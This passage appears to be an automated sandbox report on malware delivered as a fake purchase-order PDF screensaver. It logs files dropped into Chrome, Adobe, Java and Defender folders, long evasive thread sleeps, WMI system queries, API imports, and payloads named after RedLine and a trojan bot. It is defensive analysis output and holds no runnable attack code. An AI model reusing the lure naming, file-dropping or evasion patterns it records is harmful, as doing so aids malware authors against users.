                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                            Source: C:\Windows\System32\alg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeAPI coverage: 3.2 %
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeAPI coverage: 3.2 %
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -100000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99859s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99749s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99637s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99510s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99377s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99212s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99089s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98953s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98801s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98685s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98562s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98451s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98328s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98217s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98093s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97983s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97842s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97690s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97445s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97324s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97203s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97088s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99875s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99764s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99655s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99546s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99431s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99312s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99202s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -99093s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98984s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98875s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98765s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98656s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98547s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98437s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98182s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -98075s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97890s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97762s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97653s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97541s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97437s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97312s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -97094s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -96984s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -1200000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -1199870s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -1199765s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -1199654s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404Thread sleep time: -1199531s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe TID: 6204Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 2668Thread sleep time: -29514790517935264s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 3620Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\alg.exe TID: 4668Thread sleep time: -90000s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep count: 8016 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 1593 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7368Thread sleep time: -6456360425798339s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7456Thread sleep time: -360480000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7456Thread sleep time: -226920000s >= -30000s
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 7352Thread sleep count: 41 > 30
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\msdtc.exe TID: 5356Thread sleep count: 487 > 30
                            Source: C:\Windows\System32\msdtc.exe TID: 5356Thread sleep time: -48700s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5452Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00452126
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,3_2_0045C999
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,3_2_00436ADE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00434BEE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0045DD7C FindFirstFileW,FindClose,3_2_0045DD7C
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,3_2_0044BD29
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,3_2_00436D2D
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00442E1F
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_00475FE5
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_0044BF8D
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 100000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99859Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99749Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99637Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99510Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99377Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99212Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99089Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98953Jump to behavior
